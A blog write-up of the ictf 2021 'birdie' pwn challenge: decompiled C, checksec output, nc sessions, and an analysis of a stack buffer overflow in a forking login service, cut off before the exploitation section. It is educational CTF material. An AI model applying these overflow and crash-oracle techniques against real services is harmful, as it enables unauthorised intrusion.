<!doctype html><html lang=en-gb><head><meta charset=utf-8><meta http-equiv=content-type content="text/html"><meta name=viewport content="width=device-width,initial-scale=1"><title itemprop=name>ictf - A little birdie once told me... (pwn) | a rant of my adventures</title>
<meta property="og:title" content="ictf - A little birdie once told me... (pwn) | a rant of my adventures"><meta name=twitter:title content="ictf - A little birdie once told me... (pwn) | a rant of my adventures"><meta itemprop=name content="ictf - A little birdie once told me... (pwn) | a rant of my adventures"><meta name=application-name content="ictf - A little birdie once told me... (pwn) | a rant of my adventures"><meta property="og:site_name" content="a rant of my adventures"><meta name=description content="brute force canary, fork"><meta itemprop=description content="brute force canary, fork"><meta property="og:description" content="brute force canary, fork"><meta name=twitter:description content="brute force canary, fork"><meta property="og:locale" content="en-gb"><meta name=language content="en-gb"><meta itemprop=image content="https://blog.caprinux.com"><meta property="og:image" content="https://blog.caprinux.com"><meta name=twitter:image content="https://blog.caprinux.com"><meta name=twitter:image:src content="https://blog.caprinux.com"><meta property="og:type" content="article"><meta property="og:article:published_time" content="2021-05-31T00:00:00Z"><meta property="article:published_time" content="2021-05-31T00:00:00Z"><script defer type=application/ld+json>{"@context":"http://schema.org","@type":"Article","headline":"ictf - A little birdie once told me... (pwn)","author":{"@type":"Person","name":""},"datePublished":"2021-05-31","description":"brute force canary, fork","wordCount":1422,"mainEntityOfPage":"True","dateModified":"2021-05-31","image":{"@type":"imageObject","url":""},"publisher":{"@type":"Organization","name":"a rant of my adventures"}}</script><meta name=generator content="Hugo 0.121.1"><link rel=canonical href=https://blog.caprinux.com/posts/ctfs/2021/ictf-birdie/><link href=/style.min.5d415e34e927589b6ad5fe83ea6f8006479d2d6c2fa7897ee14c54c5618ba634.css rel=stylesheet><link href=/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css rel=stylesheet><link rel=apple-touch-icon sizes=180x180 href=/icons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/icons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/icons/favicon-16x16.png><link rel=mask-icon href=/icons/safari-pinned-tab.svg><link rel="shortcut icon" href=/favicon.ico><link rel=manifest href=https://blog.caprinux.com/site.webmanifest><meta name=msapplication-config content="/browserconfig.xml"><meta name=msapplication-TileColor content="#2d89ef"><meta name=theme-color content="#434648"><link rel=icon type=image/svg+xml href=/icons/favicon.svg></head><body data-theme=dark class=notransition><script src=/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script><div class=navbar role=navigation><nav class=menu aria-label="Main Navigation"><a href=https://blog.caprinux.com/ class=logo><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-home"><title>Home</title><path d="M3 9l9-7 9 7v11a2 2 0 01-2 2H5a2 2 0 01-2-2z"/><polyline points="9 22 9 12 15 12 15 22"/></svg></a><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentcolor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7H3.40726"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M.5 12.5V1.5c0-.552285.447715-1 1-1h11C13.0523.5 13.5.947715 13.5 1.5v11C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C.947715 13.5.5 13.0523.5 12.5z"/></svg></span></label><div class=trigger><ul class=trigger-container><li><a class=menu-link href=/>Home</a></li><li><a class="menu-link active" href=/posts/>Posts</a></li><li><a class=menu-link href=/pages/about/>About</a></li><li class=menu-separator><span></span></li></ul><a id=mode href=#><svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg><svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg></a></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article><header class=header><h1 class=header-title>ictf - A little birdie once told me... (pwn)</h1><div class=post-meta><time datetime=2021-05-31T00:00:00+00:00 itemprop=datePublished>31 May 2021</time></div></header><details class=toc open><summary><b>Table of Contents</b></summary><nav id=TableOfContents><ul><li><a href=#overview>Overview</a></li><li><a href=#overview-1>Overview</a></li><li><a href=#pre-exploitation>Pre-Exploitation</a><ul><li><ul><li><a href=#fuzz>Fuzz</a></li><li><a href=#main>Main</a></li><li><a href=#login>Login</a></li><li><a href=#return-to-main>Return to main</a></li></ul></li></ul></li><li><a href=#exploitation>Exploitation!</a></li></ul></nav></details><div class=page-content><p>I thought this was a good challenge so I decided to do a writeup on it. This challenge was from ictf 2021 May batch of challenges.</p><p>ictf is a discord server to get daily CTF (Capture the Flag) challenges aimed mostly towards beginners (with occasional difficult challenges). Moreover, no sign-up is required, everything is on discord.</p><h2 id=overview>Overview</h2><blockquote><p>If at first you don&rsquo;t succeed, try try again&mldr; Connect with nc 140.238.222.141 42000.</p><p>Attachments: <a href=attachments/birdie>birdie</a></p></blockquote><h2 id=overview-1>Overview</h2><hr><p>Looking at the <code>checksec</code> of the binary, we see that all protections except PIE is green.</p><pre tabindex=0><code>➜ checksec birdie

[*] &#39;/media/sf_dabian/Challenges/ictf/10/birdiee/birdie&#39;

   Arch:     amd64-64-little
   RELRO:    Full RELRO
   Stack:    Canary found
   NX:       NX enabled
   PIE:      No PIE (0x400000)
</code></pre><p>Connecting to the service, we are prompted for a password, keying in <code>aaa</code> returns <code>WRONG!</code></p><pre tabindex=0><code>➜ nc 140.238.222.141 42000
Welcome!
Please enter the password: aaa
WRONG!
</code></pre><p>Decompiling our binary, we get the following source code which I added some comments to:</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=kt>void</span> <span class=n>__noreturn</span> <span class=nf>win</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=n>stream</span> <span class=o>=</span> <span class=nf>fopen</span><span class=p>(</span><span class=s>&#34;flag.txt&#34;</span><span class=p>,</span> <span class=s>&#34;r&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=o>!</span><span class=n>stream</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=o>!</span><span class=nf>fgets</span><span class=p>(</span><span class=n>s</span><span class=p>,</span> <span class=mi>60</span><span class=p>,</span> <span class=n>stream</span><span class=p>)</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>puts</span><span class=p>(</span><span class=n>s</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>exit</span><span class=p>(</span><span class=mi>0</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=kt>unsigned</span> <span class=kt>int</span> <span class=nf>login</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=kr>__int64</span> <span class=o>*</span><span class=n>v0</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=kt>char</span> <span class=n>v2</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=kr>__int64</span> <span class=o>*</span><span class=n>v3</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=kr>__int64</span> <span class=n>v4</span><span class=p>[</span><span class=mi>5</span><span class=p>];</span>
</span></span><span class=line><span class=cl>  <span class=kt>unsigned</span> <span class=kr>__int64</span> <span class=n>v5</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=n>v4</span><span class=p>[</span><span class=mi>0</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>v4</span><span class=p>[</span><span class=mi>1</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>v4</span><span class=p>[</span><span class=mi>2</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>v4</span><span class=p>[</span><span class=mi>3</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>v4</span><span class=p>[</span><span class=mi>4</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>v3</span> <span class=o>=</span> <span class=n>v4</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Please enter the password: &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>fflush</span><span class=p>(</span><span class=n>_bss_start</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>while</span> <span class=p>(</span> <span class=mi>1</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=n>v2</span> <span class=o>=</span> <span class=nf>getchar</span><span class=p>();</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=p>(</span> <span class=n>v2</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span> <span class=p>)</span>                             <span class=c1>// if null
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=p>{</span>
</span></span><span class=line><span class=cl>      <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Goodbye&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>      <span class=nf>exit</span><span class=p>(</span><span class=mi>0</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=p>(</span> <span class=n>v2</span> <span class=o>==</span> <span class=mi>10</span> <span class=p>)</span>                             <span class=c1>// newline character ignored
</span></span></span><span class=line><span class=cl><span class=c1></span>      <span class=k>break</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=n>v0</span> <span class=o>=</span> <span class=n>v3</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=n>v3</span> <span class=o>=</span> <span class=p>(</span><span class=kt>int</span> <span class=o>*</span><span class=p>)((</span><span class=kt>char</span> <span class=o>*</span><span class=p>)</span><span class=n>v3</span> <span class=o>+</span> <span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=o>*</span><span class=p>(</span><span class=n>_BYTE</span> <span class=o>*</span><span class=p>)</span><span class=n>v0</span> <span class=o>=</span> <span class=n>v2</span><span class=p>;</span>                          <span class=c1>// otherwise *v0[i] = getchar()
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;WRONG!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>return</span> <span class=mi>0</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=kt>int</span> <span class=nf>main</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=kt>int</span> <span class=n>stat_loc</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=kt>int</span> <span class=n>fd</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>__pid_t</span> <span class=n>pid</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>  <span class=nf>setbuf</span><span class=p>(</span><span class=n>stdin</span><span class=p>,</span> <span class=mi>0LL</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>setbuf</span><span class=p>(</span><span class=n>_bss_start</span><span class=p>,</span> <span class=mi>0LL</span><span class=p>);</span>                      <span class=c1>// we are writing into _bss_start
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=nf>alarm</span><span class=p>(</span><span class=mh>0x4B0u</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>signal</span><span class=p>(</span><span class=mi>14</span><span class=p>,</span> <span class=n>timeout</span><span class=p>);</span>                          <span class=c1>// sigalarm
</span></span></span><span class=line><span class=cl><span class=c1></span>
</span></span><span class=line><span class=cl>  <span class=n>fd</span> <span class=o>=</span> <span class=nf>open</span><span class=p>(</span><span class=s>&#34;/dev/null&#34;</span><span class=p>,</span> <span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=n>fd</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=nf>dup2</span><span class=p>(</span><span class=n>fd</span><span class=p>,</span> <span class=mi>2</span><span class=p>)</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span> <span class=p>)</span>                      <span class=c1>// random gibberish
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Welcome!&#34;</span><span class=p>);</span>                             <span class=c1>// Welcome!
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=k>while</span> <span class=p>(</span> <span class=mi>1</span> <span class=p>)</span>                                   <span class=c1>// endless loop
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=n>pid</span> <span class=o>=</span> <span class=nf>fork</span><span class=p>();</span>                               <span class=c1>// used for creating a new process, which is called child process
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=k>if</span> <span class=p>(</span> <span class=n>pid</span> <span class=o>&lt;</span> <span class=mi>0</span> <span class=p>)</span>                              <span class=c1>// pid&lt;0 : creation of a child process was unsuccessful.
</span></span></span><span class=line><span class=cl><span class=c1></span>      <span class=k>break</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=p>(</span> <span class=o>!</span><span class=n>pid</span> <span class=p>)</span>                                 <span class=c1>// Returned to the newly created child process.
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=p>{</span>
</span></span><span class=line><span class=cl>      <span class=nf>login</span><span class=p>();</span>                                  <span class=c1>// login() in fork
</span></span></span><span class=line><span class=cl><span class=c1></span>      <span class=nf>exit</span><span class=p>(</span><span class=mi>0</span><span class=p>);</span>                                  <span class=c1>// exit fork
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=p>(</span> <span class=nf>waitpid</span><span class=p>(</span><span class=n>pid</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>stat_loc</span><span class=p>,</span> <span class=mi>0</span><span class=p>)</span> <span class=o>&lt;</span> <span class=mi>0</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>      <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=p>(</span> <span class=p>(</span><span class=kt>char</span><span class=p>)((</span><span class=n>stat_loc</span> <span class=o>&amp;</span> <span class=mh>0x7F</span><span class=p>)</span> <span class=o>+</span> <span class=mi>1</span><span class=p>)</span> <span class=o>&gt;&gt;</span> <span class=mi>1</span> <span class=o>&gt;</span> <span class=mi>0</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>      <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;SQUAWK!&#34;</span><span class=p>);</span>                          <span class=c1>// SQUAWK!
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span></code></pre></div><p>Okay, let&rsquo;s move on to the real deal&mldr;</p><br><h2 id=pre-exploitation>Pre-Exploitation</h2><hr><h4 id=fuzz>Fuzz</h4><p>Even though this program may look a little complex at first, we can slowly fuzz and break it down easily.</p><p>Interestingly, if we fuzz the remote service and send a longer input, we will get a different output than intended!</p><pre tabindex=0><code>➜ nc 140.238.222.141 42000

Welcome!
Please enter the password: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
WRONG!
SQUAWK!
</code></pre><p>If we send a <em>sort-of</em> de-brujin sequence to find the number of characters it takes to print <code>SQUAWK!</code>, we find that sending anything more than 40 characters causes a <code>SQUAWK!</code>.</p><pre tabindex=0><code>➜ nc 140.238.222.141 42000

Welcome!

Please enter the password: 1234567890123456789012345678901234567890 (len 40)
WRONG!

Please enter the password: 12345678901234567890123456789012345678901 (len 41)
WRONG!
SQUAWK!
</code></pre><br><h4 id=main>Main</h4><p>Okay, let&rsquo;s set that aside and understand what is going on in the program.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Welcome!&#34;</span><span class=p>);</span>                             <span class=c1>// Welcome!
</span></span></span><span class=line><span class=cl><span class=c1></span><span class=k>while</span> <span class=p>(</span> <span class=mi>1</span> <span class=p>)</span>                                   <span class=c1>// endless loop
</span></span></span><span class=line><span class=cl><span class=c1></span><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=n>pid</span> <span class=o>=</span> <span class=nf>fork</span><span class=p>();</span>                               <span class=c1>// used for creating a new process, which is called child process
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=k>if</span> <span class=p>(</span> <span class=n>pid</span> <span class=o>&lt;</span> <span class=mi>0</span> <span class=p>)</span>                              <span class=c1>// pid&lt;0 : creation of a child process was unsuccessful.
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=k>break</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=o>!</span><span class=n>pid</span> <span class=p>)</span>                                 <span class=c1>// Returned to the newly created child process.
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=nf>login</span><span class=p>();</span>                                  <span class=c1>// login() in fork
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=nf>exit</span><span class=p>(</span><span class=mi>0</span><span class=p>);</span>                                  <span class=c1>// exit fork
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=nf>waitpid</span><span class=p>(</span><span class=n>pid</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>stat_loc</span><span class=p>,</span> <span class=mi>0</span><span class=p>)</span> <span class=o>&lt;</span> <span class=mi>0</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=p>(</span><span class=kt>char</span><span class=p>)((</span><span class=n>stat_loc</span> <span class=o>&amp;</span> <span class=mh>0x7F</span><span class=p>)</span> <span class=o>+</span> <span class=mi>1</span><span class=p>)</span> <span class=o>&gt;&gt;</span> <span class=mi>1</span> <span class=o>&gt;</span> <span class=mi>0</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;SQUAWK!&#34;</span><span class=p>);</span>                          <span class=c1>// SQUAWK!
</span></span></span><span class=line><span class=cl><span class=c1></span><span class=p>}</span>
</span></span></code></pre></div><p>First, this program outputs <code>Welcome!</code>, and then it <code>fork()</code> a service. Let&rsquo;s look at what <code>fork()</code> does with <code>man fork</code>.</p><blockquote><p>fork() creates a new process by duplicating the calling process. The new process is referred to as the child process. The calling process is referred to as the parent process.</p><p>The child process is an exact duplicate of the parent process</p><p>On success, the PID of the child process is returned in the parent, and 0 is returned in the child. On failure, -1 is returned in the parent, no child process is created, and errno is set appropriately.</p></blockquote><p>It is apparent that this program checks the return value of <code>fork()</code> and if the <code>fork()</code> was unsuccessful, the program terminates. Otherwise, forked process will call <code>login()</code> and then <code>exit(0)</code> shortly after.</p><br><h4 id=login>Login</h4><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=kr>__int64</span> <span class=n>v4</span><span class=p>[</span><span class=mi>5</span><span class=p>];</span>
</span></span><span class=line><span class=cl><span class=kt>unsigned</span> <span class=kr>__int64</span> <span class=n>v5</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>v4</span><span class=p>[</span><span class=mi>0</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=n>v4</span><span class=p>[</span><span class=mi>1</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=n>v4</span><span class=p>[</span><span class=mi>2</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=n>v4</span><span class=p>[</span><span class=mi>3</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=n>v4</span><span class=p>[</span><span class=mi>4</span><span class=p>]</span> <span class=o>=</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=n>v3</span> <span class=o>=</span> <span class=n>v4</span><span class=p>;</span>
</span></span></code></pre></div><p>In the <code>login()</code> program, we see that an array <code>v4[5]</code> is declared and <code>v3 = v4</code>.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Please enter the password: &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=nf>fflush</span><span class=p>(</span><span class=n>_bss_start</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=k>while</span> <span class=p>(</span> <span class=mi>1</span> <span class=p>)</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=n>v2</span> <span class=o>=</span> <span class=nf>getchar</span><span class=p>();</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=n>v2</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span> <span class=p>)</span>                             <span class=c1>// if null
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Goodbye&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nf>exit</span><span class=p>(</span><span class=mi>0</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=n>v2</span> <span class=o>==</span> <span class=mi>10</span> <span class=p>)</span>                             <span class=c1>// newline character ignored
</span></span></span><span class=line><span class=cl><span class=c1></span>    <span class=k>break</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>v0</span> <span class=o>=</span> <span class=n>v3</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=n>v3</span> <span class=o>=</span> <span class=p>(</span><span class=kt>int</span> <span class=o>*</span><span class=p>)((</span><span class=kt>char</span> <span class=o>*</span><span class=p>)</span><span class=n>v3</span> <span class=o>+</span> <span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=o>*</span><span class=p>(</span><span class=n>_BYTE</span> <span class=o>*</span><span class=p>)</span><span class=n>v0</span> <span class=o>=</span> <span class=n>v2</span><span class=p>;</span>                          <span class=c1>// otherwise *v0[i] = getchar()
</span></span></span><span class=line><span class=cl><span class=c1></span><span class=p>}</span>
</span></span><span class=line><span class=cl><span class=nf>puts</span><span class=p>(</span><span class=s>&#34;WRONG!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=k>return</span> <span class=mi>0</span><span class=p>;</span>
</span></span></code></pre></div><p><code>login()</code> then prompts for a password and takes in a single character with <code>getchar()</code> into <code>v2</code>.</p><p>If our input is not <code>null</code> or <code>\n</code>, it then sets <code>v0 = v3</code>. For each loop, it increments <code>v3</code> by 1 and <code>v2</code> is written into <code>v0</code>.</p><p>In a nutshell, the program is something like this</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=k>while</span> <span class=p>(</span><span class=mi>1</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl><span class=n>v2</span> <span class=o>=</span> <span class=nf>getchar</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>v0</span> <span class=o>=</span> <span class=n>v3</span>
</span></span><span class=line><span class=cl><span class=n>v3</span> <span class=o>=</span> <span class=n>v3</span> <span class=o>+</span> <span class=mi>1</span>
</span></span><span class=line><span class=cl><span class=o>*</span><span class=n>v0</span> <span class=o>=</span> <span class=n>v2</span>                                       <span class=c1>// VULNERABLE!!!
</span></span></span><span class=line><span class=cl><span class=c1></span><span class=p>}</span>
</span></span></code></pre></div><p>If you haven&rsquo;t noticed where the vulnerability is, <code>v3</code> is an array of size 5, but we can write as much as we want! We have a <strong>buffer overflow</strong>.</p><p>However, there is still an unknown canary and since we do not have a leak, we are unable to overflow anything yet. There is still the mystery of <strong>SQUAWK!</strong>. Let&rsquo;s return to <code>main()</code>.</p><br><h4 id=return-to-main>Return to main</h4><p>After the fork program exits, it returns to <code>main()</code> and continues to complete the loop.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=k>if</span> <span class=p>(</span> <span class=nf>waitpid</span><span class=p>(</span><span class=n>pid</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>stat_loc</span><span class=p>,</span> <span class=mi>0</span><span class=p>)</span> <span class=o>&lt;</span> <span class=mi>0</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>  <span class=nf>exit</span><span class=p>(</span><span class=mi>1</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=k>if</span> <span class=p>(</span> <span class=p>(</span><span class=kt>char</span><span class=p>)((</span><span class=n>stat_loc</span> <span class=o>&amp;</span> <span class=mh>0x7F</span><span class=p>)</span> <span class=o>+</span> <span class=mi>1</span><span class=p>)</span> <span class=o>&gt;&gt;</span> <span class=mi>1</span> <span class=o>&gt;</span> <span class=mi>0</span> <span class=p>)</span>
